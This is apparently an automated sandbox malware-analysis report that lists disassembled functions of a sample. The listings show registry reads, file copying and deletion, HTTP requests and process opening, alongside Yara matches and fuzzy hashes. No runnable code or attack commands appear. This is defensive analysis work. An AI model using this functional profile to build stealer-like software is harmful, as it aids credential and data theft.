                                                  • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                                  • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                                  • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                                  Function 02F15777 Relevance: 10.9, APIs: 7, Instructions: 383sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1AA87: lstrlen.KERNEL32(02F0516C,?,?,02F0516C,00420DDE), ref: 02F1AA92
                                                    • Part of subcall function 02F1AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02F1AAEC
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 02F158AB
                                                  • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 02F15908
                                                  • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 02F15ABE
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F15457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 02F1548F
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F15527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 02F1557F
                                                    • Part of subcall function 02F15527: lstrlen.KERNEL32(00000000), ref: 02F15596
                                                    • Part of subcall function 02F15527: StrStrA.SHLWAPI(00000000,00000000), ref: 02F155CB
                                                    • Part of subcall function 02F15527: lstrlen.KERNEL32(00000000), ref: 02F155EA
                                                    • Part of subcall function 02F15527: strtok.MSVCRT(00000000,?), ref: 02F15605
                                                    • Part of subcall function 02F15527: lstrlen.KERNEL32(00000000), ref: 02F15615
                                                  • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 02F159F2
                                                  • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 02F15BA7
                                                  • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 02F15C73
                                                  • Sleep.KERNEL32(0000EA60), ref: 02F15C82
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcpylstrlen$Sleepstrtok
                                                  • String ID:
                                                  • API String ID: 3630751533-0
                                                  • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                  • Instruction ID: 9e36eac661a289851b2fc5f59ea365907aaba11ef96b5499cbabde79035f008e
                                                  • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                                  • Instruction Fuzzy Hash: 19E15271A11208ABCB18FBB0DE91DEE777AAF55380FC0816CA606660D0EF356B58CF51
                                                  Function 02F01577 Relevance: 10.6, APIs: 7, Instructions: 139stringfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 02F0158E
                                                    • Part of subcall function 02F01507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 02F0151B
                                                    • Part of subcall function 02F01507: RtlAllocateHeap.NTDLL(00000000), ref: 02F01522
                                                    • Part of subcall function 02F01507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 02F0153E
                                                    • Part of subcall function 02F01507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 02F0155C
                                                    • Part of subcall function 02F01507: RegCloseKey.ADVAPI32(?), ref: 02F01566
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F015B6
                                                  • lstrlen.KERNEL32(?), ref: 02F015C3
                                                  • lstrcat.KERNEL32(?,004262EC), ref: 02F015DE
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                    • Part of subcall function 02F1AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02F1AC2C
                                                    • Part of subcall function 02F1AC17: lstrcpy.KERNEL32(00000000), ref: 02F1AC6B
                                                    • Part of subcall function 02F1AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02F1AC79
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                    • Part of subcall function 02F18DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02F01660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02F18DED
                                                    • Part of subcall function 02F1AB87: lstrcpy.KERNEL32(00000000,?), ref: 02F1ABD9
                                                    • Part of subcall function 02F1AB87: lstrcat.KERNEL32(00000000), ref: 02F1ABE9
                                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 02F016CC
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F09C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02F09C53
                                                    • Part of subcall function 02F09C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 02F09C78
                                                    • Part of subcall function 02F09C27: LocalAlloc.KERNEL32(00000040,?), ref: 02F09C98
                                                    • Part of subcall function 02F09C27: ReadFile.KERNEL32(000000FF,?,00000000,02F016F6,00000000), ref: 02F09CC1
                                                    • Part of subcall function 02F09C27: LocalFree.KERNEL32(02F016F6), ref: 02F09CF7
                                                    • Part of subcall function 02F09C27: CloseHandle.KERNEL32(000000FF), ref: 02F09D01
                                                  • DeleteFileA.KERNEL32(00000000), ref: 02F01756
                                                  • memset.MSVCRT ref: 02F0177D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                  • String ID:
                                                  • API String ID: 3885987321-0
                                                  • Opcode ID: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                  • Instruction ID: 36b27b53253af68a2d8699ee072ba94ea7aa9c6cecdb08a6e861c9eec8c744da
                                                  • Opcode Fuzzy Hash: a966d81fa4e61ce0bb2f82015b0395006b0000ef8fd52be6194f2f88bed640a7
                                                  • Instruction Fuzzy Hash: 62514FB19502199BCB19FB60DD91EEE737EAF54740F8041A8A70A620C0EF706B89CF95
                                                  Function 00416920 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 67timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetSystemTime.KERNEL32(0042110C,?,?,00416B11,00000000,?,02D45BB0,?,0042110C,?,00000000,?), ref: 0041696C
                                                  • sscanf.NTDLL ref: 00416999
                                                  • SystemTimeToFileTime.KERNEL32(0042110C,00000000,?,?,?,?,?,?,?,?,?,?,?,02D45BB0,?,0042110C), ref: 004169B2
                                                  • SystemTimeToFileTime.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,02D45BB0,?,0042110C), ref: 004169C0
                                                  • ExitProcess.KERNEL32 ref: 004169DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Time$System$File$ExitProcesssscanf
                                                  • String ID: B
                                                  • API String ID: 2533653975-2248957098
                                                  • Opcode ID: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                  • Instruction ID: bc3f4e88d18d0d52d27c53656958a280d832632e1993de176dacc6bdaed8f038
                                                  • Opcode Fuzzy Hash: 985d0f7d058ad0055831b2a8c0dcfb999921c7243e7ebcfc815c5d09d464317a
                                                  • Instruction Fuzzy Hash: A421BAB5D14208AFDF04EFE4D9459EEB7B6FF48300F04852EE506A3250EB349645CB69
                                                  Function 004183DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                  • wsprintfA.USER32 ref: 00418459
                                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  • RegQueryValueExA.ADVAPI32(00000000,02D491A0,00000000,000F003F,?,00000400), ref: 004184EC
                                                  • lstrlenA.KERNEL32(?), ref: 00418501
                                                  • RegQueryValueExA.ADVAPI32(00000000,02D49230,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B34), ref: 00418599
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418608
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041861A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                  • String ID: %s\%s
                                                  • API String ID: 3896182533-4073750446
                                                  • Opcode ID: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                  • Instruction ID: cdbcbf4b9f8a1ecee5159c9abe2ba9d8dffcfa3e02281556f53420590b8fae77
                                                  • Opcode Fuzzy Hash: 31ba4a9b52ae66b65e43e00cd9c953ecc48c3f07dc5bf7da1f470b90c4e60b6b
                                                  • Instruction Fuzzy Hash: 7B210A75940218AFDB24DB54DC85FE9B3B9FB48704F00C199E60996140DF756A85CFD4
                                                  Function 02F04A17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A51
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A68
                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02F04A7F
                                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02F04AA0
                                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 02F04AB0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ??2@$CrackInternetlstrlen
                                                  • String ID: <
                                                  • API String ID: 1683549937-4251816714
                                                  • Opcode ID: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                  • Instruction ID: 12215459f7b26dbe2e54a4e5725fbf05c2f146bb9460d8df3107a54507933245
                                                  • Opcode Fuzzy Hash: c4016b40be7962ab96eee41e1f0a74c78e609d749f91f5b1f2864e454020d9f4
                                                  • Instruction Fuzzy Hash: 24213BB5D00219ABDF14DFA4EC49AEDBB75FF44321F108225E925A72D0EB706A05CF91
                                                  Function 02F178F7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02F1790B
                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 02F17912
                                                  • RegOpenKeyExA.ADVAPI32(80000002,0064A398,00000000,00020119,00000000), ref: 02F17944
                                                  • RegQueryValueExA.ADVAPI32(00000000,0064A434,00000000,00000000,?,000000FF), ref: 02F17965
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 02F1796F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                  • String ID: Windows 11
                                                  • API String ID: 3225020163-2517555085
                                                  • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                  • Instruction ID: b538304afac3a5ef64dced3ee22a76a11fa7baa516263bd0897d85568a7c55dc
                                                  • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                  • Instruction Fuzzy Hash: 32012CB9A80204BBEB00EBE0DD49FAEB7B9EB48701F405154BA0596294D7749944CF51
                                                  Function 00417690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004176A4
                                                  • HeapAlloc.KERNEL32(00000000), ref: 004176AB
                                                  • RegOpenKeyExA.ADVAPI32(80000002,02D423F0,00000000,00020119,00000000), ref: 004176DD
                                                  • RegQueryValueExA.ADVAPI32(00000000,02D49320,00000000,00000000,?,000000FF), ref: 004176FE
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00417708
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                  • String ID: Windows 11
                                                  • API String ID: 3466090806-2517555085
                                                  • Opcode ID: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                  • Instruction ID: 0438ef7ee9a5fbee92b010be2e89678c99e6505f2a73f727aa840deaa157456b
                                                  • Opcode Fuzzy Hash: 31b5ee67880bd1f967030e6ea3d78f3b54130d435c20b4c8c69cbeacade70eac
                                                  • Instruction Fuzzy Hash: E0018FBDA80204BFE700DBE0DD49FAEB7BDEB09700F004055FA05D7290E674A9408B55
                                                  Function 00417720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417734
                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041773B
                                                  • RegOpenKeyExA.ADVAPI32(80000002,02D423F0,00000000,00020119,004176B9), ref: 0041775B
                                                  • RegQueryValueExA.ADVAPI32(004176B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0041777A
                                                  • RegCloseKey.ADVAPI32(004176B9), ref: 00417784
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                  • String ID: CurrentBuildNumber
                                                  • API String ID: 3466090806-1022791448
                                                  • Opcode ID: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                  • Instruction ID: 98fe8272c38af2577472084bebc30d651685970d5c5bfe2bd2220dad028592af
                                                  • Opcode Fuzzy Hash: 43a46ff31c4728249bb55ffe5b6c0263db84e810ad24588de6037cbf7116cf65
                                                  • Instruction Fuzzy Hash: 0F0144BDA80308BFE710DFE0DC49FAEB7B9EB44704F104159FA05A7281DA7455408F51
                                                  Function 004192E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileA.KERNEL32(:A,80000000,00000003,00000000,00000003,00000080,00000000,?,00413AEE,?), ref: 004192FC
                                                  • GetFileSizeEx.KERNEL32(000000FF,:A), ref: 00419319
                                                  • CloseHandle.KERNEL32(000000FF), ref: 00419327
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSize
                                                  • String ID: :A$:A
                                                  • API String ID: 1378416451-1974578005
                                                  • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                  • Instruction ID: 8914ec7bfe49e7fff428ea2f0c8e17c8fee3bdc60d16e88834f62bd89b6794de
                                                  • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                  • Instruction Fuzzy Hash: 14F03C39E80208BBDB20DFF0DC59BDE77BAAB48710F108254FA61A72C0D6789A418B45
                                                  Function 02F07537 Relevance: 9.1, APIs: 6, Instructions: 149registrymemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 02F075A1
                                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 02F07618
                                                  • StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 02F07674
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 02F076B9
                                                  • HeapFree.KERNEL32(00000000), ref: 02F076C0
                                                    • Part of subcall function 02F094A7: vsprintf_s.MSVCRT ref: 02F094C2
                                                  • task.LIBCPMTD ref: 02F077BC
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$EnumFreeOpenProcessValuetaskvsprintf_s
                                                  • String ID:
                                                  • API String ID: 700816787-0
                                                  • Opcode ID: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                  • Instruction ID: b9c05b93c751882f74cc7d4fe435316d12aff572b5ac1b9fe2f7a6d577f80735
                                                  • Opcode Fuzzy Hash: 5434392e867cfe8b65d60c30634320f59bf744a663cfea390a94abfc30077dd7
                                                  • Instruction Fuzzy Hash: 35611BB5D0026C9BDB24DB50CC94FE9B7B9BF48384F0081E9E649A6180DBB06BC5DF94
                                                  Function 02F15527 Relevance: 9.1, APIs: 6, Instructions: 138stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02F1AA07: lstrcpy.KERNEL32(?,00000000), ref: 02F1AA4D
                                                    • Part of subcall function 02F064E7: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 02F06548
                                                    • Part of subcall function 02F064E7: StrCmpCA.SHLWAPI(?,0064A480), ref: 02F0656A
                                                    • Part of subcall function 02F064E7: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02F0659C
                                                    • Part of subcall function 02F064E7: HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02F065EC
                                                    • Part of subcall function 02F064E7: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 02F06626
                                                    • Part of subcall function 02F064E7: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02F06638
                                                    • Part of subcall function 02F1AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02F1AB6C
                                                  • StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 02F1557F
                                                  • lstrlen.KERNEL32(00000000), ref: 02F15596
                                                    • Part of subcall function 02F19097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 02F190B9
                                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 02F155CB
                                                  • lstrlen.KERNEL32(00000000), ref: 02F155EA
                                                  • strtok.MSVCRT(00000000,?), ref: 02F15605
                                                  • lstrlen.KERNEL32(00000000), ref: 02F15615
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                  • String ID:
                                                  • API String ID: 3532888709-0
                                                  • Opcode ID: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                  • Instruction ID: 65249cd022fdd633bc4d6f2e72065f1c25f1be018be3bd394612f6b49cb658fc
                                                  • Opcode Fuzzy Hash: ea37f877b7fbbacf1c7384582398939b25ca2f08c2eb8411cf358fbfa571aba2
                                                  • Instruction Fuzzy Hash: 4651D771911248EBCB28FFA0CE95AED7B76AF50780FD04018EA0A665D0EF346B45CF51
                                                  Function 02F17337 Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 02F17345
                                                    • Part of subcall function 02F1A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02F1A9EF
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,02F17574,004205BD), ref: 02F17383
                                                  • memset.MSVCRT ref: 02F173D1
                                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 02F17525
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: OpenProcesslstrcpymemset
                                                  • String ID:
                                                  • API String ID: 224852652-0
                                                  • Opcode ID: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                  • Instruction ID: 933cae83100c2c9c5db6c6be84008c75136fd3bee4f2ae2bc32b00540d1add56
                                                  • Opcode Fuzzy Hash: 1aeff6b0bc1cdda16161dcd1e0d48fd3adfd470a7707b0dabfde7a46d1ab6f7a
                                                  • Instruction Fuzzy Hash: F75170B1D00218DFDB14EBA0DD85BEDF775AF44345F9041A9E309A7281EB746A84CF58
                                                  Function 02F14317 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 02F1433C
                                                  • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 02F1435B
                                                  • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 02F1437F
                                                  • RegCloseKey.ADVAPI32(?), ref: 02F14389
                                                  • lstrcat.KERNEL32(?,00000000), ref: 02F143AE
                                                  • lstrcat.KERNEL32(?,0064A168), ref: 02F143C2
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2422726120.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_2f00000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                                  • String ID:
                                                  • API String ID: 2623679115-0
                                                  • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                  • Instruction ID: 7c88c496ec1e9b580d7bb557027431736937022b8eb8cfbe74c0c830a1a85093
                                                  • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                                  • Instruction Fuzzy Hash: 834194B6940108BBDB18EBE0DC85FEE737AAB89300F40455CA719571C0EA756688CFE1
                                                  Function 004140B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004140D5
                                                  • RegOpenKeyExA.ADVAPI32(80000001,02D49C90,00000000,00020119,?), ref: 004140F4
                                                  • RegQueryValueExA.ADVAPI32(?,02D49608,00000000,00000000,00000000,000000FF), ref: 00414118
                                                  • RegCloseKey.ADVAPI32(?), ref: 00414122
                                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                                  • lstrcatA.KERNEL32(?,02D494D0), ref: 0041415B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2421309049.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.2421309049.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2421309049.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_400000_64A.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                                  • String ID:
                                                  • API String ID: 2623679115-0
